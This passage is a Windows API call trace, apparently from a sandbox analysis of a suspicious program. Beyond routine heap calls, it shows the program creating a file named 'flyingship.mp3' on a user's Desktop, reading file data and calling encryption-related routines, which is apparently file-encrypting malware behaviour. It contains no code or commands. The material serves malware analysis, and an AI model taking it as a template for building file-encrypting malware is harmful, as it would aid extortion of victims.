returned 1 [0162.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0162.318] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0162.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0162.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0162.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0162.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0162.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0162.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0162.318] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0162.318] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0162.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0162.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0162.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0162.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0162.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0162.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0162.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0162.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0162.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0162.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0162.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0162.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0162.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0162.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0162.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0162.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0162.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0162.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0162.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0162.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0162.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0162.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0162.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0162.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0162.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0162.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0162.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0162.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6cd8 [0162.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0162.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0162.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0162.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0162.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6cd8 | out: hHeap=0x8a0000) returned 1 [0162.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0162.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0162.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0162.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0162.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0162.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0162.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0162.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0162.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0162.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0162.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0162.320] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ltz4mbbpxnfpfin1jbh3")) returned 0x10 [0162.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0162.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0162.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0162.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0162.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0162.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0162.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0162.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9d5188 [0162.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0162.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0162.320] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.flyingship.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ltz4mbbpxnfpfin1jbh3\\urxyj_reg.flyingship.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0162.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0162.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0162.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0162.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0162.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0162.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0162.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0162.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0162.322] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0162.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0162.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0162.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0162.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0162.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0162.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0162.322] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0162.322] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0162.322] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0162.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0162.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0162.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0162.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0162.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0162.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0162.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0162.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0162.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0162.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0162.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0162.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0162.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0162.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0162.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0162.323] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0162.323] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0162.326] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x3156, lpOverlapped=0x0) returned 1 [0162.326] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0162.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0162.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0162.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0162.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0162.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x13156) returned 0x9e5190 [0162.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0162.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0162.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0162.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0162.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0162.328] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0162.328] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x13156) returned 0x9f82f0 [0162.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9e5190 | out: hHeap=0x8a0000) returned 1 [0162.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0162.329] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0162.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0162.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0162.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0162.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0162.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x13156) returned 0x9e5190 [0162.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0162.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9e5190 | out: hHeap=0x8a0000) returned 1 [0162.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0162.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0162.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0162.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0162.329] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0162.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0162.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0162.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0162.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0162.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0162.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0162.329] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0162.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0162.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0162.329] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0162.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0162.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0162.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0162.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2708 [0162.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0162.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0162.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0162.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0162.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x13156) returned 0x9e5190 [0162.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0162.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2738 [0162.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0162.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0162.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0162.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26c8 [0162.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0162.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0162.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0162.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26d8 [0162.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0162.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0162.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0162.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd858 [0162.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0162.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0162.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0162.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0162.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0162.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x13156) returned 0xa48008 [0162.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0162.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0162.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0162.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0162.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0162.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0162.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0162.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0162.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0162.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0162.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0162.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0162.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0162.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0162.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0162.332] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0162.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0162.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0162.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0162.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0162.333] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0162.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0162.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0162.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0162.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0162.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0162.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0162.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0162.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0162.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0162.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0162.333] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0162.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0162.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0162.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0162.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2638 [0162.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0162.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0162.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0162.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0162.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba3d8 [0162.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0162.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0162.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0162.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0162.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0162.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0162.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0162.334] PeekMessageW (in: 